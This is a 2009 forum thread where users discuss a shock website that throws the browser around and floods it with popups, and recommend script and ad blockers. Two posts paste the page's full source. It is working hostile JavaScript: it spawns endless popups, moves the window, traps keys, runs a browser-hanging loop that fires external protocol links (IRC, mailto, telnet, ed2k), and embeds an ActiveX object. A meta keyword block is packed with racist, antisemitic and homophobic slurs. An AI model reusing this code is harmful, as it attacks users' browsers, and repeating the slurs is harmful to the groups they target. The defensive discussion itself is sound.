Zoklet.net

Go Back   Zoklet.net > Technology > Technophiles and Technophiliacs

Reply
 
Thread Tools
  #1  
Old 03-14-2009, 04:48 PM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Exclamation You know those sites that move the browser around and spam popups...

Other than being an annoyance, are they able to put any kind of malware on your computer? My friend linked me to one (he said "don't click it" after I clicked it, that stupid bastard) and I stopped it before it sent out any emails or connected to IRC but I'm worried whether there's anything else it could have done.
Reply With Quote
  #2  
Old 03-14-2009, 04:52 PM
zuperxtreme's Avatar
zuperxtreme zuperxtreme is offline
Destroyer of worlds
 
Join Date: Jan 2009
Location: Buenos Aires, Argentina.
Thanks: 1,369
Thanked 1,990 Times in 1,128 Posts
Default Re: You know those sites that move the browser around and spam popups...

View the source of the webpage.
__________________
Reply With Quote
  #3  
Old 03-14-2009, 04:53 PM
Dfg Dfg is offline
Grander Duke
 
Join Date: Jan 2009
Location: Pakistan
Thanks: 53
Thanked 975 Times in 737 Posts
Send a message via MSN to Dfg Send a message via Skype™ to Dfg
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Mankonaut View Post
Other than being an annoyance, are they able to put any kind of malware on your computer? My friend linked me to one (he said "don't click it" after I clicked it, that stupid bastard) and I stopped it before it sent out any emails or connected to IRC but I'm worried whether there's anything else it could have done.
Yes, if the website has some intentions of screwing you over and tracking cookies are quite common. Always protect yourself and use Firefox or other secure browser.
Use NoScript +Adblock plus to stop these types of popups.
Reply With Quote
  #4  
Old 03-14-2009, 04:57 PM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by zuperxtreme View Post
View the source of the webpage.
Oh I ain't going back there Plus I wouldn't know what to look for.

Quote:
Originally Posted by Dfg View Post
Yes, if the website has some intentions of screwing you over and tracking cookies are quite common. Always protect yourself and use Firefox or other secure browser.
Use NoScript +Adblock plus to stop these types of popups.
I have Adblock Plus, it informed me that it blocked 650-odd popups I'll have to check out this NoScript as well.
I'd post the link so that the more internetrically apt among us could have a chinstroke over it but I don't think that's allowed.
Reply With Quote
  #5  
Old 03-14-2009, 05:00 PM
Dfg Dfg is offline
Grander Duke
 
Join Date: Jan 2009
Location: Pakistan
Thanks: 53
Thanked 975 Times in 737 Posts
Send a message via MSN to Dfg Send a message via Skype™ to Dfg
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Mankonaut View Post
Oh I ain't going back there Plus I wouldn't know what to look for.



I have Adblock Plus, it informed me that it blocked 650-odd popups I'll have to check out this NoScript as well.
I'd post the link so that the more internetrically apt among us could have a chinstroke over it but I don't think that's allowed.
Post the link, but do warn about it's intentions. Make it clear so everyone knows NOT TO CLICK IT UNLESS you know what you are doing.
Reply With Quote
  #6  
Old 03-14-2009, 05:05 PM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Dfg View Post
Post the link, but do warn about it's intentions. Make it clear so everyone knows NOT TO CLICK IT UNLESS you know what you are doing.
Alright here ya go. This link goes straight to the site in question.
Do not go to this url!
http://web.mac.com/dalimohd/Daniel_and_Is_Website/Welcome.html
Reply With Quote
  #7  
Old 03-14-2009, 05:10 PM
Dfg Dfg is offline
Grander Duke
 
Join Date: Jan 2009
Location: Pakistan
Thanks: 53
Thanked 975 Times in 737 Posts
Send a message via MSN to Dfg Send a message via Skype™ to Dfg
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Mankonaut View Post
Alright here ya go. This link goes straight to the site in question.
Do not go to this url!
http://web.mac.com/dalimohd/Daniel_and_Is_Website/Welcome.html
It worked like a charm.

Connection Interrupted

The connection to the server was reset while the page was loading.


The network link was interrupted while negotiating a connection. Please try again.


the page loaded for a second and then the connection was reset. NoScript really saved by ass. The background sucked btw.
Reply With Quote
The following users say "It is so good to hear it!":
Mankonaut X (03-14-2009)
  #8  
Old 03-14-2009, 05:12 PM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Dfg View Post
It worked like a charm.

Connection Interrupted

The connection to the server was reset while the page was loading.


The network link was interrupted while negotiating a connection. Please try again.


the page loaded for a second and then the connection was reset. NoScript really saved by ass. The background sucked btw.
Downloadin' that joint now
Reply With Quote
  #9  
Old 03-14-2009, 05:32 PM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Default Re: You know those sites that move the browser around and spam popups...

Installed! Are the default settings good enough or are there options I should tinker with?
Reply With Quote
  #10  
Old 03-14-2009, 05:40 PM
Agent 008 Agent 008 is offline
Slightly Grander Duke
 
Join Date: Jan 2009
Thanks: 432
Thanked 1,719 Times in 1,058 Posts
Default Re: You know those sites that move the browser around and spam popups...

Wait... mac.com?
Reply With Quote
  #11  
Old 03-14-2009, 05:45 PM
Mankonaut X Mankonaut X is offline
Banned
 
Join Date: Jan 2009
Location: Demokratik Republische Der Oz
Thanks: 154
Thanked 115 Times in 79 Posts
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Agent 008 View Post
Wait... mac.com?
Yep. It doesn't redirect or anything either, it's all on the main site.
Reply With Quote
  #12  
Old 03-14-2009, 05:49 PM
Agent 008 Agent 008 is offline
Slightly Grander Duke
 
Join Date: Jan 2009
Thanks: 432
Thanked 1,719 Times in 1,058 Posts
Confused Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Mankonaut View Post
Yep. It doesn't redirect or anything either, it's all on the main site.
Do they provide hosting to their users or something? Otherwise, I see potential for a lawsuit.
Reply With Quote
  #13  
Old 03-14-2009, 05:50 PM
zuperxtreme's Avatar
zuperxtreme zuperxtreme is offline
Destroyer of worlds
 
Join Date: Jan 2009
Location: Buenos Aires, Argentina.
Thanks: 1,369
Thanked 1,990 Times in 1,128 Posts
Default Re: You know those sites that move the browser around and spam popups...

I just noticed that. wtf.
__________________
Reply With Quote
  #14  
Old 03-14-2009, 06:56 PM
Mutant Funk Drink's Avatar
Mutant Funk Drink Mutant Funk Drink is online now
Grand Duke
 
Join Date: Jan 2009
Thanks: 2,675
Thanked 1,587 Times in 1,012 Posts
Default Re: You know those sites that move the browser around and spam popups...

NoScript didn't work for me for some reason. There wasn't even an exception listed for mac.com, so I really don't know.

Fortunately, NOD32 detected it so my ass was saved. Then again, it could be that NoScript would have gotten it but NOD32 detected it beforehand? Unlikely, but I'm not sure.

This is what NOD32 said the threat was:
Code:
probably a variant of HTML/Exploit.DialogArg.A trojan
Here's the source of the page:
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
 <head>
    <title>WRONG PLACE WRONG TIME BUDDY</title>
    <meta name="keywords" content="bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays fucking linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop fuck your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library fuck george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers">
    <script type="text/javascript">
      function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA.  LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n"); }

var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major  = parseInt(navigator.appVersion);
var is_minor  = parseFloat(navigator.appVersion);
var is_ie     = (agt.indexOf("msie") != -1);
var is_ie4up  = (is_ie && (is_major >= 4));
var is_nav    = (nom.indexOf('netscape')!=-1);
var is_nav4   = (is_nav && (is_major == 4));
var is_mac    = (agt.indexOf("mac")!=-1);
var is_gecko  = (agt.indexOf('gecko') != -1);
//  GECKO REVISION
var is_rev = 0
if (is_gecko) {
    temp = agt.split("rv:")
    is_rev = parseFloat(temp[1])
}

function procreate() {
    for(i = 0; i < 16; i++) {
        popUp("index.php?popup=1");
    }
}

function popUp(URL) {
    day = new Date();
    id = day.getTime();
    eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");
}
goatseflash  = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">';
goatseflash += '  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="100%" height="100%">';
goatseflash += '    <param name="movie" value="http://static.nimp.org/flash/hello.swf" />'
goatseflash += '    <param name="wmode" value="transparent" />';
goatseflash += '  </object>'
goatseflash += '</div>';
    
function load_goatse() {
  document.body.innerHTML += goatseflash;
  setTimeout("unload_goatse()", 3000); // 3s
}
 
function unload_goatse() {
  document.getElementById("hello").style.display = 'none';
}

var protos = [ 
        "http://static.nimp.org/lm.pdf",
        "http://static.nimp.org/jews.wmv",
        "irc://irc.gnaa.us/gnaa",
        "irc://irc.efnet.org/politics",
        "news:alt.flame.niggers",
        "news:alt.flame.faggots",
        "mailto:lol@ijustpwnedj00.ca?subject=GOT SOMETHING TO BITCH ABOUT?&body=OMG WHAT IS HAPPENING!",
        "callto://US POLICE DEPARTMENT",
        "aim:GoIM?screenname=Rick_Astley&message=HY+LOL+HY+LOL",
        "rlogin://1.1.1.1:80",
        "telnet://1.1.1.1:80",
        "aim:addbuddy?listofscreennames=HY,LOL,HY,LOL,HY,LOL,join,the,gnaa,2006,RECRUITMENT,DRIVE,heartiez2incog&groupname=gnaa",
        "mailto:lol@ijustpwnedj00.ca?subject=have something to bitch about?&body=OMG WHAT IS HAPPENING!!",
        "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/",
        ];
function add(str) {
  div = document.getElementById('goatse');
  div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>';
}
    
function ruin() {
  document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>';
  while (1) {
    for (i = 0; i < protos.length; i++) {
      add(protos[i]);
    }
  }
}
    </script>
    <link rel="icon" type="image/x-icon" href="http://static.nimp.org/favicon.ico" />
    <link rel="shortcut icon" type="image/x-icon" href="http://static.nimp.org/favicon.ico" />
    <style type="text/css">
      html {
        height: 100%;
	width: 100%;
        overflow: hidden;
      }
      body {
        height: 100%;
	width: 100%;
        margin: 0;
        padding: 0;
      }
    </style>

  </head>
<body style="background-image: url(http://static.nimp.org/images/stretch.jpg); background-color: #FFFFFF;" 
  onload="load_goatse();document.goatse.reset();movew0w();setTimeout('ruin()', 20);" 
  onmousemove="document.goatse.reset();movew0w();procreate();"
  onkeydown="altf4key();ctrlkey();delkey();procreate();"
  onunload="document.goatse.reset();movew0w();procreate();"
  onmouseover="document.goatse.reset();movew0w();procreate();">
    <script type="text/javascript">
    <!--
    var images = new Array();
    var imagecount = 0;

    var delay = 10;
    var step = .2;
    var curstep = 0;

    window.resizeTo(800, 600);
    var centerX = (self.screen.width - document.body.clientWidth) / 2;
    var centerY = (self.screen.height - document.body.clientHeight - 120) / 2;
    movew0w();

    function movew0w() {
      var j;
      for (j = 0; j < 5; j++) {
        curstep += step / 5;
        var factorX = Math.sin(curstep * 6.1) * 0.9;
        var factorY = Math.cos(curstep * 3.7) * 0.9;

        factorX += 0.2 * Math.sin((20*Math.sin(curstep/20))+j*70)
                    * (Math.sin(10+curstep/(10+j))+0.2)
                    * Math.cos((curstep + j*25)/10);
        factorY += 0.2 * Math.cos((20*Math.sin(curstep/(20+j)))+j*70)
                    * (Math.sin(10+curstep/10)+0.2)
                    * Math.cos((curstep + j*25)/10);
        self.moveTo(centerX * (1.0 + factorX), centerY * (1.0 + factorY));
      }
      document.body.background = images[(Math.floor(curstep) % imagecount) + 1];
      setTimeout("movew0w()", delay);
    }
    // -->
  </script>
 <div>
  <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" height="1" width="1">
    <param name="ActivateApplets" value="1" />
    <param name="ActivateActiveXControls" value="1" />
  </object>
 </div>

  <table>
    <tr>
      <td valign="middle">
        <div style="text-align: center;">
          <a href="http://www.gnaa.us/"><img src="http://static.nimp.org/gnaa.png" alt="GNAA" /></a>
          <br />
          <br />

I checked out web.mac.com, and they do provide some amount of storage space which would possibly accommodate for that page.
http://www.apple.com/mobileme/features/idisk.html

Last edited by Mutant Funk Drink; 03-14-2009 at 06:59 PM.
Reply With Quote
  #15  
Old 03-14-2009, 07:28 PM
Dfg Dfg is offline
Grander Duke
 
Join Date: Jan 2009
Location: Pakistan
Thanks: 53
Thanked 975 Times in 737 Posts
Send a message via MSN to Dfg Send a message via Skype™ to Dfg
Default Re: You know those sites that move the browser around and spam popups...

Quote:
Originally Posted by Mutant Funk Drink View Post
NoScript didn't work for me for some reason. There wasn't even an exception listed for mac.com, so I really don't know.

Fortunately, NOD32 detected it so my ass was saved. Then again, it could be that NoScript would have gotten it but NOD32 detected it beforehand? Unlikely, but I'm not sure.

This is what NOD32 said the threat was:
Code:
probably a variant of HTML/Exploit.DialogArg.A trojan
Here's the source of the page:
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
 <head>
    <title>WRONG PLACE WRONG TIME BUDDY</title>
    <meta name="keywords" content="bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays fucking linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop fuck your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library fuck george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers">
    <script type="text/javascript">
      function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA.  LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n"); }

var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major  = parseInt(navigator.appVersion);
var is_minor  = parseFloat(navigator.appVersion);
var is_ie     = (agt.indexOf("msie") != -1);
var is_ie4up  = (is_ie && (is_major >= 4));
var is_nav    = (nom.indexOf('netscape')!=-1);
var is_nav4   = (is_nav && (is_major == 4));
var is_mac    = (agt.indexOf("mac")!=-1);
var is_gecko  = (agt.indexOf('gecko') != -1);
//  GECKO REVISION
var is_rev = 0
if (is_gecko) {
    temp = agt.split("rv:")
    is_rev = parseFloat(temp[1])
}

function procreate() {
    for(i = 0; i < 16; i++) {
        popUp("index.php?popup=1");
    }
}

function popUp(URL) {
    day = new Date();
    id = day.getTime();
    eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");
}
